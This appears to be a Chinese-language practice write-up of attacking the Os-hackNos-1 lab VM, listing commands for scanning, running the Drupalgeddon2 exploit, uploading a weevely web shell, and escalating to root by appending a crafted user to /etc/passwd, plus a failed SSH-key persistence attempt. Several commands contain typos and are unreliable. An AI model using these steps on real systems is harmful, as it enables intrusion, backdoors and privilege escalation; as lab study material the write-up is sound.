Os-hackNos-1靶机
实验主机:kali linux虚拟机(VM)
实验靶机:Os-hackNos-1靶机(Virtualbox)
实验网络:桥接模式
实验难度:简单
flag:1.普通用户的user.txt;2.root用户的user.txt
再深入是root权限维持,就是生成公钥,将kali的公钥放入Os-hackNos-1靶机里生成公钥文件ssh-keygen,后面意外翻车,就是无法成功顺利的在靶机创建公钥文件,所有root权限维持也就没成功实现,如有大佬帮忙讲解一下,谢谢~!
练习笔记:
一,信息收集
1.先看下自己是谁,是不是有一个看似正常人的身份,有没有一个正常的IP
ifconfig
- 1
2.很正常,先犀利的环顾四周看下有没有明显的目标
nmap -sP 192.168.*.0/24
- 1
3。发现目标,管他什么刀枪棍棒,先看下他的全身破绽,有什么开启的服务端口
nmap 192.168.4.233 -O -sS -sV -v
- 1
发现它开启了22:ssh和80:http服务
4。http服务有Apache,那就搜下它的网址
http://192.168.4.233
- 1
打开一个Apache页面
5.既然是个http,也到开了网页,搜下他的网址,看看有什么金银珠宝
dirb http://192.168.4.233
- 1
发现它有一个drupal目录,在看下这个目录
打开了一个登录页面,瞄眼插件,发现CMS是Drupal7,顺着这个瓜搜一下有没有情况
drupal exploit github
- 1
在漏洞库看到对应的漏洞,破绽出来了。
二,获取目标的shell
1.发现了漏洞,下载漏洞文件去开发破绽
git clone https://github.com/dreadlocked/Drupalgeddon2.git
- 1
下载一个依赖库highline
gem install highline
- 1
OK下载over
2.进入Drupalgeddon2文件夹
使用Drupalgeddon2.rb潜进网站drupal目录
./drupalgeddon2.rb http://192.168.4.233/drupal
- 1
潜入成功,可惜权限太小
三,权限维持
1.使用weevely工具生成一个php文件
weevely generate mima ./文件名.php
- 1
2.打开python服务,将生成的php文件给它传上去
python -c SimpleHTTPServer 8080
- 1
weevely http://192.168.4.207:8080/文件名.php
- 1
IP地址后面的8080端口是必须添加的,否则会发现python服务看了却上传不成功,开始怀疑人生
3.既然上传文件成功,那就用这把钥匙开更高的门
weevely http://192.168.4.233/drupal/文件名.php 密码
- 1
四,提权
1.这样就拿到了普通用户权限,看下这普通用户的用户名和密码。
2.居然是个加密,不难,先用base64解密
https://base64.supfree.net/
发现还一层加密,在使用brainfuck解密
OK成功,实验一下
在终端中运行,试验一下,没能进入root
看了下etc文件下有passwd文件
查看发现passwd是可以访问的,但编辑不了
将它下载下来,添加用户名和密码在传回去
file_download passwd 目录
- 1
openssl passwd -1 -salt salt 用户名
将这段添加进passwd里
wget http://192.168.4.233:8080/passwd -O passwd
上传
tali -1 passwd
查看最后一行
打开msf
msfconsole
- 1
搜索drupal漏洞
search drupal
- 1
选择第四个
use 第四个
- 1
set rhosts 192.168.4.233
set targeturi /drupal
run
- 1
- 2
- 3
ptrhon3 -c ‘import pty; pty.spawn("/bin/bash")’
在输入之前创建的用户名和密码就登陆到root权限了
这是拿到的两个flag
root权限维持:
没做出来,记些命令
‘两台机器都生成公钥(这是在网上看的,个人想法只在kali生成公钥放到hacknos里生成公钥文件,也是可以做出来的)
ssh-keygen 生成公钥
- 1
是不是公钥太长了哈哈
我是在下面一步翻车的,复制kali公钥,前面复制进去后面它自己又复制一遍而且这一遍前面都有>这种箭头,先创建文件在vim打开输入也这样,根本创建不成功,很难受,可以提点一下吗
echo 'ssh-rsa kali公钥 root@kali' > 公钥文件名_keys
- 1
在用ssh连接
ssh 之前创建的用户名@192.168.4.233
- 1
连接成功输入whoami
就是root权限了
请提点,谢谢~!!!
Bye!